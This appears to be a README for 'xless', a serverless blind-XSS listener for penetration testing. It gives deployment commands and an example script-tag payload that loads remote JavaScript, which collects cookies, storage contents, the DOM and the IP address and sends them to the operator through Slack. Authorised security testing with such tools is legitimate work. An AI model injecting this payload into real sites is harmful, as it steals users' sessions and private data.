xless: The Serverless Blind XSS App
XLESS – The Serverless Blind XSS App
xless is a serverless blind XSS app that can be used to identify blind XSS vulnerabilities using your own deployed version of the app. There is no need to run a full deployment process; just set up a zeit.co account and run bash deploy.sh. That’s it. You have a fully-running Blind XSS listener that uses Slack to notify you for blind XSS callbacks.
Requirements
- zeit.co account: Zeit provides a free plan for serverless. If you use another provider for serverless, code changes should be minimal.
- Slack Incoming Webhook URL.
Deployment
- Run:
$ git clone https://github.com/mazen160/xless.git
$ bash deploy.sh
> Deploying ~/xless under X
> https://xless.now.sh [v2] [in clipboard] [4s]
> Success! Deployment ready [4s]
- Use the URL for blind XSS testing 🔥
Xless will automatically serve the XSS payload, collect information, and exfiltrate it into your serverless app, which is then sent right to you in Slack.
Example Payload
<script src="https://xless.now.sh"></script>
Demo
Collected Data
- Cookies
- User-Agent
- HTTP Referrer
- Browser DOM
- Browser Time
- Document Location
- Origin
- LocalStorage
- SessionStorage
- IP Address
Copyright (C) 2019 Mazin Ahmed
Source: https://github.com/mazen160/
